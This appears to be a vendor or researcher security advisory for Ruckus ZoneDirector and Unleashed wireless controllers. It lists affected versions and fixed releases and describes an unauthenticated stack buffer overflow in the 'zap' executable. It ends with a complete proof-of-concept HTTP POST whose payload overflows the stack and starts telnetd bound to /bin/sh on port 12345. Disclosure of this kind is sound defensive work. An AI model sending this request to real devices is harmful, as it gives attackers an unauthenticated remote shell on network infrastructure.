- ZoneDirector - Unleashed
- ZoneDirector: 9.9 and before - ZoneDirector: 9.10.x - ZoneDirector: 9.12.x - ZoneDirector: 9.13.x - ZoneDirector: 10.0.x - ZoneDirector: 10.1.x - ZoneDirector: 10.2.x - ZoneDirector: 10.3.x - Unleashed: 200.6 and before - Unleashed: 200.7
- 9.10.x: Upgrade to 9.10.2.0.84 - 9.12.x: Upgrade to 9.12.3.0.136 - 9.13.x: Upgrade to 10.0.1.0.90 - 10.0.x: Upgrade to 10.0.1.0.90 - 10.1.x: Upgrade to 10.1.2.0.275 - 10.2.x: Upgrade to 10.2.1.0.147 - 10.3.x: Upgrade to 10.3.1.0.21 - 200.6 and before: Upgrade to 200.7.10.202.94 - 200.7: Upgrade to 200.7.10.202.94
Stack buffer overflow/remote code execution vulnerability via a crafted unauthenticated HTTP request
zap executable contains unsafe strnpy() on its “-D” argument parser. It can be used to overflow the stack and run arbitrary code. Unintended arguments can be passed to zap by using CVE-2019-19836.
Information about the exploitation of the vulnerability can be found in our blog post or the 36C3 talk.
Stack buffer overflow on zap executable using unauthenticated jaxa request:
POST /tools/_cmdstat.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded charset=UTF-8
Content-Length: 473
<ajax-request action='docmd' xcmd='wc' updater='system.1568118269965.3208' comp='zapd'>
<xcmd cmd='wc' comp='zapd' wcid=1 client='1.1.1.1' tool='zap-up' zap-type='udp' server='1.1.1.2 -D/tmp/Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0A2p������p���5Ad6$r��d8Ad9Ae0Ae1A3Ae4Ae5Ae6A,e7AeCCCCDDDD������������f5Af6Af7,CCCC,telnetd,-l/bin/sh,-p12345' syspmtu=65500 />
</ajax-request>